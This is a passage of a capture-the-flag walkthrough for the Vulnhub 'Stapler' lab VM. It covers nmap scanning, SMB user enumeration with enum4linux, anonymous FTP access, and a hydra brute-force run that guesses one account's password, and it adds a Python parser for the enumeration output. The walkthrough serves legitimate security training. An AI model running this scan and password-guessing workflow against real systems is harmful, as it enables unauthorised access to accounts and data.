Stapler: 1 Walkthrough

Kanishka, May 15, 2017

Stapler is a boot-to-root virtual machine hosted on Vulnhub.

Description of the challenge

[ASCII-art stapler logo]

Name: Stapler | IP: DHCP
Date: 2016-June-08 | Goal: Get Root!
Author: g0tmi1k | Difficulty: ??? ;)

+ Average beginner/intermediate VM, only a few twists
+ May find it easy/hard (depends on YOUR background)
+ ...also which way you attack the box

+ It SHOULD work on both VMware and Virtualbox
+ REBOOT the VM if you CHANGE network modes
+ Fusion users, you'll need to retry when importing

+ There are multiple methods to do this machine
+ At least two (2) paths to get a limited shell
+ At least three (3) ways to get root access

+ Made for BsidesLondon 2016
+ Slides: https://download.vulnhub.com/media/stapler/

+ Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman
+ ...and shout-outs to the VulnHub-CTF Team =)

--[[~~Enjoy. Have fun. Happy Hacking.~~]]--

Identify the IP address of the Stapler machine
Nmap Ping Scan

root@kali:~# nmap -sn 192.168.1.1/24
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-14 21:32 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0032s latency).
MAC Address: A0:63:91:F0:CC:4B (Netgear)
Nmap scan report for 192.168.1.2
Host is up (0.053s latency).
MAC Address: 70:70:0D:C9:AD:78 (Unknown)
Nmap scan report for 192.168.1.3
Host is up (0.098s latency).
MAC Address: B0:DF:3A:DE:59:08 (Samsung Electronics)
Nmap scan report for 192.168.1.9
Host is up (0.096s latency).
MAC Address: 54:EA:A8:7A:43:03 (Apple)
Nmap scan report for 192.168.1.10
Host is up (0.098s latency).
MAC Address: BC:9F:EF:69:35:19 (Unknown)
Nmap scan report for 192.168.1.11
Host is up (0.00015s latency).
MAC Address: F4:0F:24:33:5E:D1 (Unknown)
Nmap scan report for 192.168.1.12
Host is up (0.16s latency).
MAC Address: 04:56:04:47:D4:5C (Unknown)
Nmap scan report for 192.168.1.13
Host is up (0.092s latency).
MAC Address: 68:37:E9:88:16:5F (Unknown)
Nmap scan report for 192.168.1.15
Host is up (0.17s latency).
MAC Address: 80:3F:5D:21:DC:73 (Winstars Technology)
Nmap scan report for 192.168.1.30
Host is up (0.00069s latency).
MAC Address: 08:00:27:F7:14:0B (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.1.28
Host is up.
Nmap done: 256 IP addresses (11 hosts up) scanned in 15.82 seconds
root@kali:~#

Identify services running on Stapler

root@kali:~# nmap -sT -sV -A -O -v -p 1-65535 192.168.1.30
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-14 21:37 EDT
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:37
Completed NSE at 21:37, 0.00s elapsed
Initiating NSE at 21:37
Completed NSE at 21:37, 0.00s elapsed
Initiating ARP Ping Scan at 21:37
Scanning 192.168.1.30 [1 port]
Completed ARP Ping Scan at 21:37, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:37
Completed Parallel DNS resolution of 1 host. at 21:37, 0.01s elapsed
Initiating Connect Scan at 21:37
Scanning 192.168.1.30 [65535 ports]
Discovered open port 80/tcp on 192.168.1.30
Discovered open port 139/tcp on 192.168.1.30
Discovered open port 21/tcp on 192.168.1.30
Discovered open port 53/tcp on 192.168.1.30
Discovered open port 22/tcp on 192.168.1.30
Discovered open port 3306/tcp on 192.168.1.30
Discovered open port 12380/tcp on 192.168.1.30
Connect Scan Timing: About 20.24% done; ETC: 21:39 (0:02:02 remaining)
Connect Scan Timing: About 48.38% done; ETC: 21:39 (0:01:05 remaining)
Discovered open port 666/tcp on 192.168.1.30
Completed Connect Scan at 21:38, 104.90s elapsed (65535 total ports)
Initiating Service scan at 21:38
Scanning 8 services on 192.168.1.30
Completed Service scan at 21:39, 18.59s elapsed (8 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.30
NSE: Script scanning 192.168.1.30.
Initiating NSE at 21:39
Completed NSE at 21:39, 31.16s elapsed
Initiating NSE at 21:39
Completed NSE at 21:39, 0.02s elapsed
Nmap scan report for 192.168.1.30
Host is up (0.00059s latency).
Not shown: 65523 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later

| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|_ 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
| id.server:
|_ bind.version: dnsmasq-2.75
80/tcp open http
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: 404 Not Found
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom?
3306/tcp open mysql MySQL 5.7.12-0ubuntu1

| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 8
| Capabilities flags: 63487
| Some Capabilities: ConnectWithDatabase, Speaks41ProtocolOld, LongPassword, SupportsCompression, LongColumnFlag, SupportsLoadDataLocal, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, InteractiveClient, IgnoreSigpipes, FoundRows, ODBCClient, SupportsTransactions, DontAllowDatabaseTableColumn, Support41Auth, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: -X{pKvU019`9J&5\x1C<up\x1E\x00
|_ Auth Plugin Name: 88
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:F7:14:0B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.003 days (since Sun May 14 21:35:49 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| RED<00> Flags: <unique><active>
| RED<03> Flags: <unique><active>
| RED<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
| Computer name: red
| NetBIOS computer name: RED
| Domain name:
| FQDN: red
|_ System time: 2017-05-15T02:39:18+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.60 ms 192.168.1.30
NSE: Script Post-scanning.
Initiating NSE at 21:39
Completed NSE at 21:39, 0.00s elapsed
Initiating NSE at 21:39
Completed NSE at 21:39, 0.00s elapsed
Post-scan script results:
| clock-skew:
|_ 1s: Majority of systems scanned
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 157.08 seconds
Raw packets sent: 29 (2.784KB) | Rcvd: 13 (952B)
root@kali:~#

Port 139 — Enumerating SMB

Run enum4linux

root@kali:~# enum4linux -a 192.168.1.30
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 15 14:52:47 2017
==========================
| Target Information |
==========================
Target ........... 192.168.1.30
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 192.168.1.30 |
====================================================
[+] Got domain/workgroup name: WORKGROUP
============================================
| Nbtstat Information for 192.168.1.30 |
============================================
Looking up status of 192.168.1.30
RED <00> - H <ACTIVE> Workstation Service
RED <03> - H <ACTIVE> Messenger Service
RED <20> - H <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> H <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> H <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - H <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> H <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
=====================================
| Session Check on 192.168.1.30 |
=====================================
[+] Server 192.168.1.30 allows sessions using username '', password ''
===========================================
| Getting domain SID for 192.168.1.30 |
===========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
======================================
| OS information on 192.168.1.30 |
======================================
[+] Got OS info for 192.168.1.30 from smbclient: Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
[+] Got OS info for 192.168.1.30 from srvinfo:
RED Wk Sv PrQ Unx NT SNT red server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
=============================
| Users on 192.168.1.30 |
=============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.
=========================================
| Share Enumeration on 192.168.1.30 |
=========================================
WARNING: The "syslog" option is deprecated
Connection to 192.168.1.30 failed (Error NT_STATUS_IO_TIMEOUT)
[+] Attempting to map shares on 192.168.1.30
====================================================
| Password Policy Information for 192.168.1.30 |
====================================================
[+] Attaching to 192.168.1.30 using a NULL share
[+] Trying protocol 445/SMB...
[!] Protocol failed: [Errno 110] Connection timed out (192.168.1.30:445)
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] RED
[+] Builtin
[+] Password Info for Domain: RED
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
==============================
| Groups on 192.168.1.30 |
==============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=======================================================================
| Users on 192.168.1.30 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-864226560-67800430-3082388513
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
<snip>
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
<snip>
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
<snip>
^C
root@kali:~#

The output gives us a list of usernames. Let's extract them and keep them for later use.

root@kali:~# cat users.txt
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)
root@kali:~# cut -d '\' -f2 users.txt | cut -d ' ' -f1 > user_list.txt
root@kali:~# cat user_list.txt
peter
RNunemaker
ETollefson
DSwanger
AParnell
SHayslett
MBassin
JBare
LSolum
IChadwick
MFrei
SStroud
CCeaser
JKanode
CJoo
Eeth
LSolum2
JLipps
jamie
Drew
SHAY
Taylor
mel
kai
NATHAN
www
elly
root@kali:~#
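As an added example (not from the original post), here is a Python parser for the RID-cycling section of the enum4linux output above. Unlike the cut pipeline, it also copes with the BUILTIN groups, the unresolved `*unknown*` entries and the `<snip>` markers, so it can be run over the raw output rather than a pre-filtered users.txt; the SAMPLE block is a constructed excerpt of that output.

```python
import re
from collections import Counter

# One RID-cycling result line, as enum4linux prints it (see the output above):
#   S-1-22-1-1000 Unix User\peter (Local User)
#   S-1-5-32-544 BUILTIN\Administrators (Local Group)
#   S-1-5-32-500 *unknown*\*unknown* (8)
RID_LINE = re.compile(
    r"^(?P<sid>S-1(?:-\d+)+)\s+"           # full SID; the RID is the last component
    r"(?P<authority>[^\\]+)\\"             # 'Unix User' | 'BUILTIN' | '*unknown*'
    r"(?P<name>\S+(?: \S+)*?)\s+"          # account or group name, may contain spaces
    r"\((?P<kind>[^)]*)\)\s*$"             # '(Local User)' | '(Local Group)' | '(8)'
)


def parse_rid_lines(text):
    """Return one dict per resolved SID; progress lines, '<snip>' and
    unresolved RIDs (sidtype 8, shown as *unknown*) are skipped."""
    entries = []
    for raw in text.splitlines():
        m = RID_LINE.match(raw.strip())
        if not m or m["authority"] == "*unknown*":
            continue
        sid = m["sid"]
        entries.append({
            "sid": sid,
            "rid": int(sid.rsplit("-", 1)[1]),
            "authority": m["authority"],
            "name": m["name"],
            "kind": m["kind"],
        })
    return entries


def local_users(entries):
    """Usernames of 'Local User' entries, in first-seen order, without duplicates."""
    seen = []
    for e in entries:
        if e["kind"] == "Local User" and e["name"] not in seen:
            seen.append(e["name"])
    return seen


def summarize(entries):
    """Number of entries per (authority, kind), e.g. {('Unix User', 'Local User'): 4}."""
    return Counter((e["authority"], e["kind"]) for e in entries)


# Constructed excerpt of the enum4linux output above (a subset of the 27 users).
SAMPLE = """\
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\\peter (Local User)
S-1-22-1-1005 Unix User\\SHayslett (Local User)
S-1-22-1-1018 Unix User\\jamie (Local User)
S-1-22-1-1029 Unix User\\elly (Local User)
<snip>
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\\*unknown* (8)
S-1-5-32-544 BUILTIN\\Administrators (Local Group)
S-1-5-32-547 BUILTIN\\Power Users (Local Group)
"""

if __name__ == "__main__":
    entries = parse_rid_lines(SAMPLE)
    print("\n".join(local_users(entries)))   # same list the cut pipeline produces
    print(dict(summarize(entries)))
```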

Port 21 — Enumerating FTP
Nmap has identified that the FTP service allows anonymous login.

root@kali:~# ftp 192.168.1.30
Connected to 192.168.1.30.
220-
220-|--------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|--------------------------------------------------------------|
220-
220
Name (192.168.1.30:root): anonymous
331 Please specify the password.
Password:anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 107 Jun 03 2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (133.2809 kB/s)
ftp> exit
221 Goodbye.
root@kali:~# ls -la note
-rw-r--r-- 1 root root 107 May 14 21:48 note
root@kali:~# cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
root@kali:~#

Let's brute-force the FTP login with hydra, using the user list we obtained from enum4linux as both the username list and the password list.

root@kali:~# hydra -L user_list.txt -P user_list.txt 192.168.1.30 ftp
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-15 15:57:45
[DATA] max 16 tasks per 1 server, overall 64 tasks, 729 login tries (l:27/p:27), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.30 login: SHayslett password: SHayslett
[STATUS] 281.00 tries/min, 281 tries in 00:01h, 448 to do in 00:02h, 16 active
[STATUS] 281.50 tries/min, 563 tries in 00:02h, 166 to do in 00:01h, 16 active
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-15 16:00:22
root@kali:~# ftp 192.168.1.30
Connected to 192.168.1.30.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.1.30:root): SHayslett
331 Please specify the password.
Password:SHayslett
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 5 0 0 4096 Jun 03 2016 X11
drwxr-xr-x 3 0 0 4096 Jun 03 2016 acpi
-rw-r--r-- 1 0 0 3028 Apr 20 2016 adduser.conf
-rw-r--r-- 1 0 0 51 Jun 03 2016 aliases
-rw-r--r-- 1 0 0 12288 Jun 03 2016 aliases.db
drwxr-xr-x 2 0 0 4096 Jun 07 2016 alternatives
drwxr-xr-x 8 0 0 4096 Jun 03 2016 apache2
drwxr-xr-x 3 0 0 4096 Jun 03 2016 apparmor
drwxr-xr-x 9 0 0 4096 Jun 06 2016 apparmor.d
drwxr-xr-x 3 0 0 4096 Jun 03 2016 apport
drwxr-xr-x 6 0 0 4096 Jun 03 2016 apt
-rw-r----- 1 0 1 144 Jan 14 2016 at.deny
drwxr-xr-x 5 0 0 4096 Jun 03 2016 authbind
-rw-r--r-- 1 0 0 2188 Sep 01 2015 bash.bashrc
drwxr-xr-x 2 0 0 4096 Jun 03 2016 bash_completion.d
-rw-r--r-- 1 0 0 367 Jan 27 2016 bindresvport.blacklist
drwxr-xr-x 2 0 0 4096 Apr 12 2016 binfmt.d
drwxr-xr-x 2 0 0 4096 Jun 03 2016 byobu
drwxr-xr-x 3 0 0 4096 Jun 03 2016 ca-certificates
-rw-r--r-- 1 0 0 7788 Jun 03 2016 ca-certificates.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 console-setup
drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.d
drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.daily
drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.hourly
drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.monthly
drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.weekly
-rw-r--r-- 1 0 0 722 Apr 05 2016 crontab
-rw-r--r-- 1 0 0 54 Jun 03 2016 crypttab
drwxr-xr-x 2 0 0 4096 Jun 04 2016 dbconfig-common
drwxr-xr-x 4 0 0 4096 Jun 03 2016 dbus-1
-rw-r--r-- 1 0 0 2969 Nov 10 2015 debconf.conf
-rw-r--r-- 1 0 0 12 Apr 30 2015 debian_version
drwxr-xr-x 3 0 0 4096 Jun 05 2016 default
-rw-r--r-- 1 0 0 604 Jul 02 2015 deluser.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 depmod.d
drwxr-xr-x 4 0 0 4096 Jun 03 2016 dhcp
-rw-r--r-- 1 0 0 26716 Jul 30 2015 dnsmasq.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 dnsmasq.d
drwxr-xr-x 4 0 0 4096 Jun 07 2016 dpkg
-rw-r--r-- 1 0 0 96 Apr 20 2016 environment
drwxr-xr-x 4 0 0 4096 Jun 03 2016 fonts
-rw-r--r-- 1 0 0 594 Jun 03 2016 fstab
-rw-r--r-- 1 0 0 132 Feb 11 2016 ftpusers
-rw-r--r-- 1 0 0 280 Jun 20 2014 fuse.conf
-rw-r--r-- 1 0 0 2584 Feb 18 2016 gai.conf
-rw-rw-r-- 1 0 0 1253 Jun 04 2016 group
-rw------- 1 0 0 1240 Jun 03 2016 group-
drwxr-xr-x 2 0 0 4096 Jun 03 2016 grub.d
-rw-r----- 1 0 42 1004 Jun 04 2016 gshadow
-rw------- 1 0 0 995 Jun 03 2016 gshadow-
drwxr-xr-x 3 0 0 4096 Jun 03 2016 gss
-rw-r--r-- 1 0 0 92 Oct 22 2015 host.conf
-rw-r--r-- 1 0 0 12 Jun 03 2016 hostname
-rw-r--r-- 1 0 0 469 Jun 05 2016 hosts
-rw-r--r-- 1 0 0 411 Jun 03 2016 hosts.allow
-rw-r--r-- 1 0 0 711 Jun 03 2016 hosts.deny
-rw-r--r-- 1 0 0 1257 Jun 03 2016 inetd.conf
drwxr-xr-x 2 0 0 4096 Feb 06 2016 inetd.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 init
drwxr-xr-x 2 0 0 4096 Jun 06 2016 init.d
drwxr-xr-x 5 0 0 4096 Jun 03 2016 initramfs-tools
-rw-r--r-- 1 0 0 1748 Feb 04 2016 inputrc
drwxr-xr-x 3 0 0 4096 Jun 03 2016 insserv
-rw-r--r-- 1 0 0 771 Mar 06 2015 insserv.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 insserv.conf.d
drwxr-xr-x 2 0 0 4096 Jun 03 2016 iproute2
drwxr-xr-x 2 0 0 4096 Jun 03 2016 iptables
drwxr-xr-x 2 0 0 4096 Jun 03 2016 iscsi
-rw-r--r-- 1 0 0 345 May 15 17:54 issue
-rw-r--r-- 1 0 0 197 Jun 03 2016 issue.net
drwxr-xr-x 2 0 0 4096 Jun 03 2016 kbd
drwxr-xr-x 5 0 0 4096 Jun 03 2016 kernel
-rw-r--r-- 1 0 0 144 Jun 03 2016 kernel-img.conf
-rw-r--r-- 1 0 0 26754 Jun 07 2016 ld.so.cache
-rw-r--r-- 1 0 0 34 Jan 27 2016 ld.so.conf
drwxr-xr-x 2 0 0 4096 Jun 07 2016 ld.so.conf.d
drwxr-xr-x 2 0 0 4096 Jun 03 2016 ldap
-rw-r--r-- 1 0 0 267 Oct 22 2015 legal
-rw-r--r-- 1 0 0 191 Jan 19 2016 libaudit.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 libnl-3
drwxr-xr-x 4 0 0 4096 Jun 06 2016 lighttpd
-rw-r--r-- 1 0 0 2995 Apr 14 2016 locale.alias
-rw-r--r-- 1 0 0 9149 Jun 03 2016 locale.gen
-rw-r--r-- 1 0 0 3687 Jun 03 2016 localtime
drwxr-xr-x 6 0 0 4096 Jun 03 2016 logcheck
-rw-r--r-- 1 0 0 10551 Mar 29 2016 login.defs
-rw-r--r-- 1 0 0 703 May 06 2015 logrotate.conf
drwxr-xr-x 2 0 0 4096 Jun 04 2016 logrotate.d
-rw-r--r-- 1 0 0 103 Apr 12 2016 lsb-release
drwxr-xr-x 2 0 0 4096 Jun 03 2016 lvm
-r--r--r-- 1 0 0 33 Jun 03 2016 machine-id
-rw-r--r-- 1 0 0 111 Nov 20 2015 magic
-rw-r--r-- 1 0 0 111 Nov 20 2015 magic.mime
-rw-r--r-- 1 0 0 2579 Jun 04 2016 mailcap
-rw-r--r-- 1 0 0 449 Oct 30 2015 mailcap.order
drwxr-xr-x 2 0 0 4096 Jun 03 2016 mdadm
-rw-r--r-- 1 0 0 24241 Oct 30 2015 mime.types
-rw-r--r-- 1 0 0 967 Oct 30 2015 mke2fs.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 modprobe.d
-rw-r--r-- 1 0 0 195 Apr 20 2016 modules
drwxr-xr-x 2 0 0 4096 Jun 03 2016 modules-load.d
lrwxrwxrwx 1 0 0 19 Jun 03 2016 mtab -> ../proc/self/mounts
drwxr-xr-x 4 0 0 4096 Jun 06 2016 mysql
drwxr-xr-x 7 0 0 4096 Jun 03 2016 network
-rw-r--r-- 1 0 0 91 Oct 22 2015 networks
drwxr-xr-x 2 0 0 4096 Jun 03 2016 newt
-rw-r--r-- 1 0 0 497 May 04 2014 nsswitch.conf
drwxr-xr-x 2 0 0 4096 Apr 20 2016 opt
lrwxrwxrwx 1 0 0 21 Jun 03 2016 os-release -> ../usr/lib/os-release
-rw-r--r-- 1 0 0 6595 Jun 23 2015 overlayroot.conf
-rw-r--r-- 1 0 0 552 Mar 16 2016 pam.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 pam.d
-rw-r--r-- 1 0 0 2908 Jun 04 2016 passwd
-rw------- 1 0 0 2869 Jun 03 2016 passwd-
drwxr-xr-x 4 0 0 4096 Jun 03 2016 perl
drwxr-xr-x 3 0 0 4096 Jun 03 2016 php
drwxr-xr-x 3 0 0 4096 Jun 06 2016 phpmyadmin
drwxr-xr-x 3 0 0 4096 Jun 03 2016 pm
drwxr-xr-x 5 0 0 4096 Jun 03 2016 polkit-1
drwxr-xr-x 3 0 0 4096 Jun 03 2016 postfix
drwxr-xr-x 4 0 0 4096 Jun 03 2016 ppp
-rw-r--r-- 1 0 0 575 Oct 22 2015 profile
drwxr-xr-x 2 0 0 4096 Jun 03 2016 profile.d
-rw-r--r-- 1 0 0 2932 Oct 25 2014 protocols
drwxr-xr-x 2 0 0 4096 Jun 03 2016 python
drwxr-xr-x 2 0 0 4096 Jun 03 2016 python2.7
drwxr-xr-x 2 0 0 4096 Jun 03 2016 python3
drwxr-xr-x 2 0 0 4096 Jun 03 2016 python3.5
-rwxr-xr-x 1 0 0 472 Jun 06 2016 rc.local
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc0.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc1.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc2.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc3.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc4.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc5.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc6.d
drwxr-xr-x 2 0 0 4096 Jun 06 2016 rcS.d
-rw-r--r-- 1 0 0 23 May 15 17:54 resolv.conf
